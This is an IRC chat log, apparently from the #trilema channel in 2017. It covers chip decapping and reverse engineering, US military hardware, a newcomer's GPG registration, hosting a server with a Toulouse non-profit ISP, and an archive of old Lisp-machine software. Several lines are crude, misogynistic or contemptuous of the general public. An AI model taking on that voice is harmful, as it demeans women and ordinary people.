suspecting. 1735200;1510245922;asciilifeform;lol 1735201;1510245936;mircea_popescu;strangely there seem to be some extant records where he himself thinks the same! 1735202;1510245958;asciilifeform;speaking of, asciilifeform learned that folx in guangdong will laser-decap ICs for fiddybux/ea. 1735203;1510245996;mircea_popescu;that's pretty good. 1735204;1510246000;asciilifeform;ikr? 1735205;1510246001;mircea_popescu;ea or ea layer ? 1735206;1510246027;asciilifeform;my item has 1 metal layer, so i didn't ask. but i'd expect moar layers, cost extra. 1735207;1510246036;mircea_popescu;otherwise it'd be pretty scary. 1735208;1510246047;asciilifeform;mailing it back an' forth per layer, would be annoying 1735209;1510246060;asciilifeform;if yer thing is multilayered you'd ideally have the microscopy done in same house. 1735210;1510246095;mircea_popescu;scary enough as it is, the hopes of the us as to http://btcbase.org/log/2017-10-08#1722633 are entirely spurious. teh chinese have long reversed all us military chips. 1735211;1510246095;a111;Logged on 2017-10-08 14:18 mircea_popescu: " “The Saudi’s will not be able to link the S-400 with Saudi’s current (US and Europe-sourced) infrastructure, nor will they be able to connect the S-400 with US systems." << says who the everloving fuck. 1735212;1510246102;mircea_popescu;~only reason the saudis even bought the crap in the first place. 1735213;1510246123;mircea_popescu;asciilifeform ofcourse. 1735214;1510246137;asciilifeform;idk that usg any longer even uses items not of chinese make to begin with 1735215;1510246152;mircea_popescu;the rocketry chips are made in like vermont at considerable expense 1735216;1510246161;asciilifeform;at least in 1980s they were. nfi re nao. 1735217;1510246170;mircea_popescu;80s iirc east coast. 1735218;1510246228;asciilifeform;half the reason for the ultra-dense vlsi thing , i suspect, is to make reversing a headache 1735219;1510246240;asciilifeform;( rather than 'performance' or whatever nonsense ) 1735220;1510246266;mircea_popescu;myeah 1735221;1510246283;asciilifeform;also gotta distinguish b/w the 2 types of reversing ( did we have thread ? ) -- sov-style clone is CONSIDERABLY easier than proper logical reverse 1735222;1510246287;mircea_popescu;performance of the density kind is an anti-model for rocketry. on the contrary, large, wide edge process like the z80s much better fit for space usage. 1735223;1510246311;asciilifeform;in the 'logical' sense , original z80 was only ~recently~ publicly reversed 1735224;1510246314;mircea_popescu;asciilifeform the chinese have teh manpower to do it, if organized. 1735225;1510246328;asciilifeform;i'd expect. the trick is that almost no one has ever any reason. 1735226;1510246340;asciilifeform;usually what is wanted is -- cheap local clone. 1735227;1510246343;mircea_popescu;national state aspirations. 1735228;1510246365;mircea_popescu;and in other adult women, http://78.media.tumblr.com/a27554aac9813b9b1975fef271f3a33e/tumblr_nl7z3wYWjR1tenemio1_1280.jpg 1735229;1510246452;asciilifeform;( in almost every case i can think of, 'design from 0' is cheaper than 'logical reverse'. so the latter is ~only done when you are specifically looking for weaknesses or otherwise items present only in the original , vs the spec ) 1735230;1510246460;mircea_popescu;incidentally, it occurs to me, euroZONE is the perfect word for it, isn't it ? 1735231;1510246462;mircea_popescu;finally, the zone. 1735232;1510246480;mircea_popescu;asciilifeform they ARE looking for weaknesses. there's a reason usg lost south china sea. 1735233;1510246483;asciilifeform;большая зона (tm)(r) 1735234;1510246498;mircea_popescu;euroзона. perfect. 1735235;1510246507;asciilifeform;mircea_popescu: i thought it 'lost' because noballs ( rather than rockets-not-rockety-enuff ) 1735236;1510246514;*;mircea_popescu will use this henceforth to distinguish the item from europe. 1735237;1510246552;mircea_popescu;asciilifeform so let me get this straight : you think beta loves his cock cage because "no balls", and NOT because "small cock" ? these are somehow different ? 1735238;1510246566;mircea_popescu;they had plenty of balls in 1990, if memory serves. even bombed belgrade. 1735239;1510246578;asciilifeform;dun need balls to bomb ~defenseless orcs 1735240;1510246614;mircea_popescu;so the balls and the penis are related ? i thought so! 1735241;1510246642;mircea_popescu;they've no balls cuz they've no penis and vice versa, and ultimately because no testosterone so every bit of soy sauce they pick up from environment makes the titties sag a little hurtlier. 1735242;1510246811;asciilifeform;http://btcbase.org/log/2017-11-09#1735222 << returning briefly upstack, there's a 'seekrit' bit of hilarity : usg actually moving away from old, classic 'z80-style' dies, and into 'let's have modern density, so we can run javaturds, let ibm make 'space-grade' ppc , etc -- but that's ok, we'll use 8 in tandem ' 1735243;1510246811;a111;Logged on 2017-11-09 16:51 mircea_popescu: performance of the density kind is an anti-model for rocketry. on the contrary, large, wide edge process like the z80s much better fit for space usage. 1735244;1510246850;asciilifeform;asciilifeform discovered this when digging in recent ada lit 1735245;1510246851;mircea_popescu;kinda why the chinese have to take them apart. 1735246;1510246867;mircea_popescu;noyhing better than a door protected by 8 flawed locks. 1735247;1510246895;asciilifeform;hence the recent interest in 'what happens to crypto when single-event fault' etc 1735248;1510246925;asciilifeform;( if your cryptotron ~branches~ -- potentially very interesting things happen ) 1735249;1510246937;mircea_popescu;would matter a lot more if the us actually used crypto. 1735250;1510246998;asciilifeform;they use plenty of 'crypto' 1735251;1510247047;mircea_popescu;somehow crypto discipline is impossible for military staffs. except for the okw, everyone has trouble with it, be the soviets talking to sub base or the ustards talking totheir "socialites" or w/e they call the tired old bags. 1735252;1510247073;mircea_popescu;i have nfi why or wherefore, it's about as counterintuitive as the coy behaviour in females. 1735253;1510247370;asciilifeform;senile old brezhnevs insisting on using plain vs crypto pnoje , yes. tho i was thinking of crypto in weapons systems and other unattended 'get magic packet, detonate' items. 1735254;1510247439;mircea_popescu;to explain ourselves : the coy behaviour is defined as the spurious pretense of sexual disinterest put forth by a universally-interested machine ; and it is counterproductive because while it does in fact increase (somewhat) the success with above-average value partners, it entirely ruins any perpsective of success with the highest value partners. that this may (arguable, and i doubt it) sum to positive over a larege populati 1735255;1510247439;mircea_popescu;on fails to overshadow the fact that individually speaking if you're going to sink nine months of blood + three of fat into the project, you totally fucking want the very very best available. 1735256;1510247463;asciilifeform;( in the 'detonate' case, it isn't clear what enemy gets from reversing your die if you used correctly-built publickeytronics ) 1735257;1510247468;mircea_popescu;now, the generals are similar : for the benefit of "oh, it's directly readable" they lose out on the all-important, paramount consideration, "but not by the enemmy" 1735258;1510247492;mircea_popescu;asciilifeform i suspect the logical conclusion would be to say old men revert into dysfunctional womanhood. 1735259;1510247501;asciilifeform;this is ancient observation 1735260;1510247506;asciilifeform;incl. in old trilema 1735261;1510247510;mircea_popescu;i guess it is, at that. 1735262;1510247560;mircea_popescu;"sack all o10 and over that no longer have a supermodel mistress" 1735263;1510247624;mircea_popescu;it's inexplicable, to me at least, how virility is not part of the army qualifying list, btw. "this dude does not look hot naked and therefore can no longer be an army general. retired." seems perfectly mandatory for a fucking army. 1735264;1510247736;asciilifeform;sadly the head gives out 1st. 1735265;1510247748;mircea_popescu;it's a crapshot. sometimes, last. sometimes, first. 1735266;1510247757;asciilifeform;( and in many of these 'great leaders' , head was not the strongest organ to begin with ) 1735267;1510247792;mircea_popescu;well... military men. it's like a profession. if your tax accountant sucks at go that doesn't necessarily disqualify him from his line of work. 1735268;1510248586;*;asciilifeform digs, but fails to find link , re incident where jp attaches taught go to the german general staff, and they actually played, until the house with the boards was destroyed in bombing raid 1735269;1510248644;asciilifeform;there was even some interest in usa, 'learn the game that built the strategy of the enemy!11' lulz 1735270;1510248755;ben_vulpes;at least in usg, "fighting readiness" is both sexist and racist 1735271;1510248794;asciilifeform;ben_vulpes: in any case it hasn't applied to generals ever since they stopped being expected to lead men on horseback into attack 1735272;1510248815;asciilifeform;modern general sits, wizened lbj, in bunker. 1735273;1510248845;ben_vulpes;modern infantryman sits, pimply snowden, driving 'big dog' from same 1735274;1510248864;asciilifeform;this'd be so if the army in the colour brochures were the actual usg army 1735275;1510248880;asciilifeform;as it is it barely can afford trucks that dun leak oil, much less any quantity of 'bigdog' 1735276;1510248898;asciilifeform;the fancy hardware that exists, is largely circa 1980s. 1735277;1510248984;asciilifeform;actually very closely resembles nazi army . yes, somewhere there is dr von braun with wunderwaffen. but mostly it's d00dz with old rifles. 1735278;1510249019;ben_vulpes;predator and phriendz seem to work fine, so long as nobody's spoofing gps 1735279;1510249027;ben_vulpes;but yes, this is 'leaking oil' 1735280;1510249039;asciilifeform;worx great against defenseless camels. 1735281;1510249085;asciilifeform;( 1940s-era propeller fighters also would. but these cost moar money, and you gotta train somebody to fly, etc ) 1735282;1510249158;asciilifeform;!!up ang-st 1735283;1510249158;ben_vulpes;!!up ang-st 1735284;1510249159;deedbot;ang-st voiced for 30 minutes. 1735285;1510249159;deedbot;ang-st voiced for 30 minutes. 1735286;1510249176;ben_vulpes;who are you and what brings you by, ang-st ? 1735287;1510249189;ang-st;hi ben_vulpes 1735288;1510249203;ang-st;a random conversation in the internet 1735289;1510249249;asciilifeform;such detail 1735290;1510249249;ang-st;so i thought i might idle for a while, see what's going on 1735291;1510249259;asciilifeform;ang-st: how about link to the 'random conversation' ? 1735292;1510249266;ang-st;wow many question 1735293;1510249274;ben_vulpes;ang-st: there are logs at http://logs.bvulpes.com/trilema and btcbase.org/logs for the idling 1735294;1510249320;ang-st;ok i prefer grep than talking so, it will be fine 1735295;1510249340;ben_vulpes;ang-st: logs have historical grep 1735296;1510249370;ben_vulpes;in other "random conversations": https://mechanicalmarkets.wordpress.com/2017/11/05/bitcoin-nemo-dat/ 1735297;1510249413;ang-st;i guess the random guy having this random convo with me was davout 1735298;1510249430;ben_vulpes;ang-st: link? 1735299;1510249431;asciilifeform;ben_vulpes: mind-boggling, neh , 'i'm gonna idle for some entirely randomly selected several hours' 'why not read multi-year log' 'what's a log' 1735300;1510249464;ang-st;ben_vulpes: you're not on that channel and i guess it's priv8 1735301;1510249476;ben_vulpes;ang-st: you guess? based on...? 1735302;1510249493;ben_vulpes;eyy davout what is this character going on about 1735303;1510249498;ang-st;the "coutume" there ? 1735304;1510249528;ben_vulpes;top seekrit irc channels omg how speshul 1735305;1510249547;ang-st;who said irc ? 1735306;1510249570;ben_vulpes;oh its some shambling modern browser monstrosity? 1735307;1510249572;asciilifeform;'if you’re worried you possess stolen coins and want to sell them, you may want to consult a lawyer first. The National Stolen Property Act could apply to intangible goods' << lol!! 1735308;1510249579;ang-st;ben_vulpes: worse 1735309;1510249583;ben_vulpes;asciilifeform: pretty amusing yeah? 1735310;1510249586;ang-st;kind of electon based client 1735311;1510249600;ben_vulpes;ang-st: kinda exactly what i just said 1735312;1510249614;asciilifeform;'National Give Us Everything Or Heavenly Legions Shall Smite You Act' next. 1735313;1510249621;ben_vulpes;what, you think electron isn't fifteen packaged browsers? 1735314;1510249627;shinohai;lulzy asciilifeform 1735315;1510249665;ang-st;fitfteen .... juste one chromium 1735316;1510249668;ben_vulpes;ang-st: the other day i observed 'slack' fail to inline a 7.4 meg gif because its authors are who they are 1735317;1510249690;asciilifeform;ben_vulpes: inline ? 1735318;1510249690;ben_vulpes;ang-st: per "slack group", ofc 1735319;1510249701;ang-st;you can problaly fail it in many way 1735320;1510249713;ben_vulpes;asciilifeform: where they show an image in the chat based on its link 1735321;1510249727;ang-st;even get a bounty if you're that kind of guy :) 1735322;1510249730;ben_vulpes;you know, the sort of thing that web pages do normally, but that js idiots can't figure out how to do 1735323;1510249745;asciilifeform;ben_vulpes: iirc thing has 'chrome' internally, so displaying a 8M gif prolly eats 8G 1735324;1510249761;ang-st;you can have also perfect asshole in C 1735325;1510249761;ben_vulpes;> because its authors are who they are 1735326;1510249780;ang-st;i was about to says rust :) 1735327;1510249787;ben_vulpes;gotta say, i've never seen the perfect asshole 1735328;1510249803;asciilifeform;ang-st: asshole in C << koch, drepper, et al. but they're old and they ain't making more, for some reason. 1735329;1510249880;ang-st;asciilifeform: i think you can grab a bunch that are pretty active 1735330;1510249902;ben_vulpes;ang-st: anyways, the way this place works is that you register a gpg key with deedbot, and then maybe someone gives you provisional membership in the list of folks that can give themselves speaking privileges 1735331;1510249937;ben_vulpes;good idea to do that sooner rather than later; provisional ratings are easy to come by for the newcomer who registers quickly, less so for the obstinate/self-important 1735332;1510249996;ang-st;will rtfm the stuff 1735333;1510250255;ben_vulpes;http://btcbase.org/log/2017-11-07#1733631 << it occurred to me that the fortification model is entirely unsuited for war against the megastate. correct approach here is "we can deliver munitions anywhere within $city, even to a mobile individual." 1735334;1510250255;a111;Logged on 2017-11-07 20:01 asciilifeform: observe, the problem dun exist if you already have your own pyongyang and can happily put a megawatt station there and invite whoever objects, to pound sand up his arse 1735335;1510250308;asciilifeform;ben_vulpes: sorta was the impetus for asciilifeform's entire q -- can haz transoceanic radio that scales down to, e.g., suitcase 1735336;1510250322;ben_vulpes;"and for as long as your citizens run free 802.* rebroadcasters, we're going to be utterly uninterdictable" 1735337;1510250342;ben_vulpes;asciilifeform: i absolutely understand 1735338;1510250450;mircea_popescu;http://btcbase.org/log/2017-11-09#1735271 << a general is a staff position, he sits on hill next to artillery not charges with cavalry. that's colonel at most. 1735339;1510250450;a111;Logged on 2017-11-09 17:33 asciilifeform: ben_vulpes: in any case it hasn't applied to generals ever since they stopped being expected to lead men on horseback into attack 1735340;1510250463;asciilifeform;bbut napoleon!11 1735341;1510250478;mircea_popescu;but physically decrepit general, especially when no good disease excuse, is kinda like gouty priest. evidently -- not doing his job. 1735342;1510250570;mircea_popescu;http://btcbase.org/log/2017-11-09#1735275 << hey, they traded in the frigates for "litteral completely sunk"s, somehow missing entirely the sad irony of blue-sea-unworthy frigate. 1735343;1510250570;a111;Logged on 2017-11-09 17:34 asciilifeform: as it is it barely can afford trucks that dun leak oil, much less any quantity of 'bigdog' 1735344;1510250888;mircea_popescu;http://btcbase.org/log/2017-11-09#1735297 << ah, are you the dev.to guy ? 1735345;1510250888;a111;Logged on 2017-11-09 17:43 ang-st: i guess the random guy having this random convo with me was davout 1735346;1510250942;ang-st;!!register http://vmpg.tetaneutral.net/keys.asc 1735347;1510250945;deedbot;F6859D5B0BD80C6F8B19A07DD64423DB580E6CFB registered as ang-st. 1735348;1510251005;mircea_popescu;!!up ang-st 1735349;1510251005;deedbot;ang-st voiced for 30 minutes. 1735350;1510251046;mircea_popescu;http://btcbase.org/log/2017-11-09#1735296 << studiously ignored the "nobody holds any title to any bitcoin" portions of http://trilema.com/2012/the-reasons-why-bitcoin-securities-cant-be-regulated-by-the-sec/#selection-129.0-129.311 final and dispositive ruling on the matter. 1735351;1510251046;a111;Logged on 2017-11-09 17:42 ben_vulpes: in other "random conversations": https://mechanicalmarkets.wordpress.com/2017/11/05/bitcoin-nemo-dat/ 1735352;1510251083;mircea_popescu;but yes, one'd fully expect pretend-sovereigns of the fiat ilk to arbitrarily assign themselves title in bitcoin. why the hell not, they've assinged themselves "representativity" of "society" and "justice" and "the environment" and so forth. 1735353;1510251153;asciilifeform;if 'all land belongs to the crown', and 'sea belongs', and 'radio spectrum belongs', etc. why not also bitcoin. 1735354;1510251160;asciilifeform;moon, stars. 1735355;1510251195;mircea_popescu;if all the "here's the usg-bitcoin, accept it in exchange" doesn't work as it hasn't with ripple/ethereum/bitcoin-core/crash/whatever, the only remaining avenue is the idly papal claim to "all the bitcoins". 1735356;1510251208;mircea_popescu;of course, the original pope trying for this ended up going around barefoot in the snow to beg forgiveness. 1735357;1510251232;ben_vulpes;mircea_popescu: lol see comments 1735358;1510251260;mircea_popescu;ben_vulpes ah lol. 1735359;1510251261;asciilifeform;'how many divisions has the pope?' (tm)(r)(iosif vissarionovich) 1735360;1510251317;davout;http://btcbase.org/log/2017-11-09#1735350 <<< stopped at first paragraph 1735361;1510251317;a111;Logged on 2017-11-09 18:10 mircea_popescu: http://btcbase.org/log/2017-11-09#1735296 << studiously ignored the "nobody holds any title to any bitcoin" portions of http://trilema.com/2012/the-reasons-why-bitcoin-securities-cant-be-regulated-by-the-sec/#selection-129.0-129.311 final and dispositive ruling on the matter. 1735362;1510251378;davout;http://btcbase.org/log/2017-11-09#1735344 <<< nah 1735363;1510251378;a111;Logged on 2017-11-09 18:08 mircea_popescu: http://btcbase.org/log/2017-11-09#1735297 << ah, are you the dev.to guy ? 1735364;1510251379;mircea_popescu;basically it's a whole pile of "how could i reinterpret the world through my firmly held notions of biblical truth". this is nice and good, provided a large solid comedy goldmine for the whole 1800s, "darwinism debate" still ongoing in particularily protected corners of the swamp. 1735365;1510251436;ben_vulpes;!!rate ang-st 1 apparently knows a good idea when he hears one 1735366;1510251439;deedbot;Get your OTP: http://p.bvulpes.com/pastes/4oIY9/?raw=true 1735367;1510251467;ben_vulpes;!!v C6181F2FC66C392C917F45AEF91C73BDF0CFF5E2D030A3D6BC3E760BA3618123 1735368;1510251468;deedbot;ben_vulpes rated ang-st 1 << apparently knows a good idea when he hears one 1735369;1510251495;mircea_popescu;ang-st 'sce-que c'est cet "tetraneutral" ? 1735370;1510251496;ben_vulpes;tetaneutral heh 1735371;1510251501;ben_vulpes;neutral tits! 1735372;1510251508;davout;!!rate ang-st 1 didn't run away screaming in the first ten minutes 1735373;1510251509;ang-st;a non profit isp 1735374;1510251511;deedbot;Get your OTP: http://p.bvulpes.com/pastes/xnTbq/?raw=true 1735375;1510251516;mircea_popescu;o.O 1735376;1510251528;mircea_popescu;do you have like what, a rack in toulouse ? 1735377;1510251536;davout;!!v 8F3CBEB97CA6214773072EEE5840B31547F40F9A85B2EA9C1C4D017E2ACF84F7 1735378;1510251536;deedbot;davout rated ang-st 1 << didn't run away screaming in the first ten minutes 1735379;1510251551;mircea_popescu;ben_vulpes funny thing, i read a r in there. 1735380;1510251576;mircea_popescu;apparently #tetaneutral.net 1735381;1510251577;ang-st;mircea_popescu: no we have our own AS, 2 kind of DC room a 10G line 1735382;1510251591;mircea_popescu;where, this ? 1735383;1510251601;ang-st;toulouse south of france 1735384;1510251612;mircea_popescu;both dcs ? 1735385;1510251718;ang-st;well we have a true DC room, and an "assocative" one (as in french term association which stand for non profit org) 1735386;1510251747;mircea_popescu;what's that, like the old style interchange room ? 1735387;1510251774;ang-st;mostly a room located in a legaluzed squat 1735388;1510251779;ang-st;legalized* 1735389;1510251780;mircea_popescu;right. 1735390;1510251795;mircea_popescu;any interest in getting a rack or two in a similar squat somewhere in the colonies, algerie, morocco, whatever ? 1735391;1510251857;ang-st;well, that's kind of stuff that you might talk at #tetaneutral.net 1735392;1510251880;mircea_popescu;also : any interest in moving your associates registration to the already existing and well developed deedbot WoT infrastrcture ? payments via same system, in bitcoin ? 1735393;1510251956;ang-st;well i tried to push for bitcoin at some point, but didn't get many support 1735394;1510251960;mircea_popescu;as it happens we're right in the middle of building republican infrastructure, in principle at least as to what meets the eye very similar to whart you have there. 1735395;1510251988;mircea_popescu;ang-st consider how this works here : http://btcbase.org/log-search?q=%21%21pay and http://btcbase.org/log-search?q=%21%21withdraw 1735396;1510252024;mircea_popescu;consider also the whole WoT infrastructure ( http://trilema.com/2014/what-the-wot-is-for-how-it-works-and-how-to-use-it/ and say http://wot.deedbot.org ) 1735397;1510252164;ang-st;might work if most of our users were tech savy, but tbh the way it goes actually it would be a burden if mandatory or simply ignored beside some folks in any other cases 1735398;1510252179;mircea_popescu;but your partners ? not tech savy either ? 1735399;1510252191;mircea_popescu;or is the idea here that user=partner 1735400;1510252341;ang-st;well you might give a try :-) 1735401;1510252353;mircea_popescu;ang-st there's a matter of scope here, your => 4652.00 (total en moyenne mensuelle) is 2/3 or so of the random advance pushed out to one purveyor of eventual tmsr.isp. the republic is indeed mighty in this sense ; meanwhile there's also an ideological rub, the republic is dedicatedly elitist whereas from what i see the whole point of this tetaneutral thing is to support specifically those-who-should-not-be-permitted-online, 1735402;1510252353;mircea_popescu;ie the makers of the endless september, the " a burden if mandatory or simply ignored". 1735403;1510252354;ang-st;but i think it's a bit early 1735404;1510252371;ang-st;in people mind 1735405;1510252371;mircea_popescu;i don't know yet, there might be something here. 1735406;1510252406;mircea_popescu;ang-st early how do you mean ? i see it's >6 yo by now. 1735407;1510252431;ang-st;how long beetween the seminal RSA paper and it's widespread use ? 1735408;1510252449;mircea_popescu;i don't consider rsa was used until we started using it. 1735409;1510252461;ang-st;:) 1735410;1510252470;mircea_popescu;so what, 3 decades. 1735411;1510252506;mircea_popescu;asciilifeform you wanna send one box on an adventure to these folk ? 1735412;1510252512;asciilifeform;sure 1735413;1510252519;asciilifeform;tho fr is nearly as 'good' as usa afaik 1735414;1510252528;mircea_popescu;just about. but hey. what you got in stock ? 1735415;1510252537;ang-st;my point is crypto concept are still miles away from general public (and i consider most user of ttnn as general public) 1735416;1510252557;asciilifeform;mircea_popescu: me ? i have the 3 pilot boxen as prev. catalogued. or you meant him 1735417;1510252560;mircea_popescu;ang-st my point, conversely, is that the general public is as human as the population of holstein cattle. nobody cares nor ever will. 1735418;1510252573;mircea_popescu;asciilifeform i meant you. name one, what was it ? opteron what ? 1735419;1510252579;ang-st;sorry dunno the reference 1735420;1510252638;ang-st;ok got ir 1735421;1510252638;mircea_popescu;http://s3-wp-lyleprintingandp.netdna-ssl.com/wp-content/uploads/2017/01/27160428/holstein-record-Ever-Green-View-My-Gold-ET.jpg << holstein cow. 1735422;1510252642;ang-st;it* 1735423;1510252665;*;asciilifeform digs in log. could've sworn i posted the specs 1735424;1510252763;ang-st;i feel that considering people as cow, or what ever, isn't a good way to make line move 1735425;1510252781;ang-st;juste an easy way to feel "high level" 1735426;1510252805;mircea_popescu;well, also a cheap explanation as to why there's "flat earth" believers to this day. but we digress. 1735427;1510252819;mircea_popescu;ang-st say !!up to deedbot in a pm, then !!v with the challenge string 1735428;1510252821;asciilifeform;i have currently 3 boxen for pilot plant. all 3 contain 32cores of 'opteron 6376'. 2 of them contain 256M of ram; 1 currently has 24G ( can hold up to 256 ). each has 2 x G/sec nics, 2 x (reduntant) 700W ps . 1735429;1510252824;asciilifeform;BingoBoingo et al ^ 1735430;1510252877;mircea_popescu;ang-st so what'd it cost me for you folks to host 1 sealed box, containing an opteron 6376 as above, cool it and feed it its required wattage and bw ? 1735431;1510252879;asciilifeform;each is of 1U physical dimension. 1735432;1510253212;mircea_popescu;wd. 1735433;1510253252;ang-st;needed some time to figure out otp stuff 1735434;1510253275;mircea_popescu;yeah. worth it, esp if you keep your key secure, as perfect identity online. 1735435;1510253309;ang-st;mircea_popescu: question@tetaneutral.net it you want to put a box there 1735436;1510253316;mircea_popescu;im not going to use email. 1735437;1510253324;ang-st;irc ? :) 1735438;1510253326;mircea_popescu;working with the republic is entirely dependent on working ON republican methods. 1735439;1510253331;mircea_popescu;yeah, irc. 1735440;1510253350;ang-st;well consider them neighboor with different coutume :) 1735441;1510253379;ben_vulpes;doesn't make the scytale an acceptable cipher 1735442;1510253380;mircea_popescu;sure. but im not going there. 1735443;1510253411;ang-st;np :) 1735444;1510253432;*;mircea_popescu recently went to limon, on the basis of one chick observing "Hey, most of the local girls we fuck are actually from limon! maybe check out the source ?" then couldn't find either an acceptable restaurant or hotel, so turned the capsule back and returned home. 1735445;1510253508;mircea_popescu;limon is thereby a neighbourhood with a different coutume, which is to say eating huge platters of badly done teriyaki and thinking "hotel" is "i built some rooms atop the garage myself and will permit vagabonds to crash there". 1735446;1510253796;ang-st;if it works for them, i'm fine with it, anyway i would not follow their architectural advises, that's it :) 1735447;1510254663;ang-st;http://btcbase.org/log/2017-11-09#1735401 https://chiliproject.tetaneutral.net/projects/tetaneutral/wiki/Valeurs as a quick translate of main obecjtives i would say, lawfull privacy (we can't protect you from french authority), net neutrality , at your will price 1735448;1510254663;a111;Logged on 2017-11-09 18:32 mircea_popescu: ang-st there's a matter of scope here, your => 4652.00 (total en moyenne mensuelle) is 2/3 or so of the random advance pushed out to one purveyor of eventual tmsr.isp. the republic is indeed mighty in this sense ; meanwhile there's also an ideological rub, the republic is dedicatedly elitist whereas from what i see the whole point of this tetaneutral thing is to support specifically those-who-should-not-be-permitted-online, 1735449;1510254688;ang-st;i would add, volunteer based and best effort support 1735450;1510254731;ang-st;we alreeady forked as the structure was to big 1735451;1510254774;ang-st;ie we mostly need volunteer no cash :) 1735452;1510254780;mircea_popescu;aha. 1735453;1510254885;mircea_popescu;ang-st protection from whatever soi-dissant "government" or whatever is not being contemplated at any point. what is being contemplated is not protecting the pretend-government itself from its own actions. so if it steals a box, that's fine, we shall say "the so and so illegitimate criminal gang stole so and so republican property" and that's that. no us-style "secrecy" is the whole story. 1735454;1510254926;mircea_popescu;at this phase, interdicting the socialist mind's self-misrepresentations is quite sufficient. 1735455;1510255027;mircea_popescu;also support is not sought, i don't think, if by support you mean manpower as opposed to you know, cooling. (if the latter, there's really 0 interest in a "best effort dc / someone's house".) 1735456;1510255048;mircea_popescu;what'd those volunteers do ? 1735457;1510255132;asciilifeform;mircea_popescu: very, very basic 'support' can't really be gone without -- 'pull disk #5 and put this-here that i mailed you in', 'tell this new box its ip', 'yank the box and mail to me, i'm going home' etc. 1735458;1510255152;mircea_popescu;asciilifeform satellite node anyway, mostly there to judge the crowd than anything. 1735459;1510255165;asciilifeform;and needless to say none of these happen unless valid pgpgram 1735460;1510255177;asciilifeform;otherwise any derp can 'hey mail me this machine' 1735461;1510255194;mircea_popescu;heh. 1735462;1510255203;ang-st;well ..on isp side deploy wifi networks, on hosting/core network side admin stuff, some amdinstrative task, troll (or not) in irc, move to local event ... 1735463;1510255224;ang-st;have lunch and beer sometime :) 1735464;1510255228;ang-st;+s 1735465;1510255228;mircea_popescu;ang-st most of those would be best recruited in a cafe in toulouse neh ? 80% or more of whatthey do being physical presence 1735466;1510255257;ang-st;well ssh is marvellous but phy stuff of course 1735467;1510255275;ang-st;event with a jet you can't be faster than a local motivated guy 1735468;1510255277;mircea_popescu;sooo... it's not directly obvious how having money would increase teh volunteers 10fold ? 1735469;1510255285;mircea_popescu;after all, the google "Volunteers" are there for the cafeteria. 1735470;1510255353;mircea_popescu;in other lulz, http://lesplanade.org/ that link of liaisons isn't that maintained is it ? 1735471;1510255389;asciilifeform;lol spamola 1735472;1510255414;mircea_popescu;ang-st incidentally, what happened on march 2015 ? pretty much broke the organisation, what was it, the usual "colectif socialiste" internal quarrel and split ? who left ? 1735473;1510255480;ang-st;2 different area, 2 different problematic and the wish to go "for profit" ie build a company on top, create billed jobs 1735474;1510255488;ang-st;for once 1735475;1510255494;ang-st;for one* 1735476;1510255506;mircea_popescu;so basically the more active folks took off and made their own corp ? is it still in business ? 1735477;1510255511;ang-st;so org meeting, vote, next 1735478;1510255515;ang-st;yup 1735479;1510255528;ang-st;it deploy in a "zone blanche" 1735480;1510255534;mircea_popescu;what's that ? 1735481;1510255543;ang-st;area without broadband intenet 1735482;1510255548;mircea_popescu;ah 1735483;1510255558;ang-st;middle mountain 1735484;1510255575;ang-st;so basically there are the only one here 1735485;1510255584;ang-st;hence to much demands 1735486;1510255604;mircea_popescu;https://chiliproject.tetaneutral.net/projects/tetaneutral << is my search broken or are you not in there ? 1735487;1510255648;ang-st;i you look my gpg metadata, you'll see me mentioned as cofounder elsewhere 1735488;1510255652;ang-st;if* 1735489;1510255706;ang-st;anyway there many people that are more involved than me in the project now 1735490;1510255743;mircea_popescu;i see. 1735491;1510255753;mircea_popescu;what metadata am i looking at, some email off digitalservice.group ? 1735492;1510255814;ang-st;look a bit more than dns 1735493;1510255819;ang-st;:) 1735494;1510255842;mircea_popescu;https://zebitcoin.com/gb/ << "buy and sell bitcoin with credit card". this... sounds like 2012! 1735495;1510255846;ang-st;haha 1735496;1510255857;ang-st;agreed 1735497;1510255896;ang-st;pretty ugly, almost robust, good to go on business 1735498;1510255914;mircea_popescu;i have my doubts re that last point, but glwith it! 1735499;1510255969;ang-st;well i have some not to be release numbers that would prove you wrong :) 1735500;1510255977;ang-st;but nevermind 1735501;1510255981;mircea_popescu;aite then. 1735502;1510256388;asciilifeform;meanwhile in entomologies, http://yahozna.dyndns.org/scratch/loser.gif 1735503;1510256417;asciilifeform;( http://yahozna.dyndns.org/scratch/ quite interesting find, incl. massive symbolics lm pile . phf , do you know who he is ? ) 1735504;1510256453;mircea_popescu;jesus they make shitty tables now 1735505;1510256467;asciilifeform;mircea_popescu: i have nfi, could be theatrical 1735506;1510256472;*;mircea_popescu has credible oak desk, can pound to satisfaction. improves the furnioture in the process 1735507;1510256535;asciilifeform;1860620 gcc-1.42.tar.gz << such nostalg 1735508;1510256540;ben_vulpes;that is not a table, that is finely spun chineseium 1735509;1510256554;ben_vulpes;more of a tent 1735510;1510256623;ben_vulpes;> simcity2000.sit 1735511;1510256658;asciilifeform;massive collection of rarities and rubbish both 1735512;1510256672;asciilifeform;e.g. http://yahozna.dyndns.org/scratch/genera 1735513;1510256700;mircea_popescu;nice find 1735514;1510256726;asciilifeform;sadly most of it is stuff that was on the cd set 1735515;1510256751;mircea_popescu;ancient gcc surely wasnt lol 1735516;1510256758;asciilifeform;i meant the bolix 1735517;1510256766;asciilifeform;but the rest -- yes, variously interesting 1735518;1510256777;asciilifeform;( even something for vax ) 1735519;1510256827;asciilifeform;http://yahozna.dyndns.org/scratch/genera/tape/ asciilifeform never had 1735520;1510256827;ben_vulpes;genera/tape/Genera 5.2/Sources/ 1735521;1510256846;ben_vulpes;sounds interesting, is that a commonly shared thing, the sources? 1735522;1510256851;asciilifeform;i have nfi if these sources are subset, superset, or same as the ones on the cd 1735523;1510256853;ben_vulpes;(assuming they are source code) 1735524;1510256859;ben_vulpes;what is "the cd"? 1735525;1510256880;asciilifeform;the one dks gave out to all junk buyers. it is also on warez ( on 'piratebay' to this day afaik ) 1735526;1510256896;ben_vulpes;ah 1735527;1510256898;mircea_popescu;and in other great antiques from known sources, https://thelastpsychiatrist.com/2013/09/real_men_want_to_drink_guinnes.html 1735528;1510256901;scriba;TypeError: argument of type 'NoneType' is not iterable (file "modules/archive.py", line 59, in archive_a_url) 1735529;1510256909;asciilifeform;umm 1735530;1510256916;asciilifeform;eggog? 1735531;1510256921;mircea_popescu;Framedragger ^ 1735532;1510256924;mircea_popescu;prolly triefd to archive it 1735533;1510256960;asciilifeform;ben_vulpes: http://yahozna.dyndns.org/scratch/genera/GENERA_8_3.iso seems to be a copy of selfsame cd 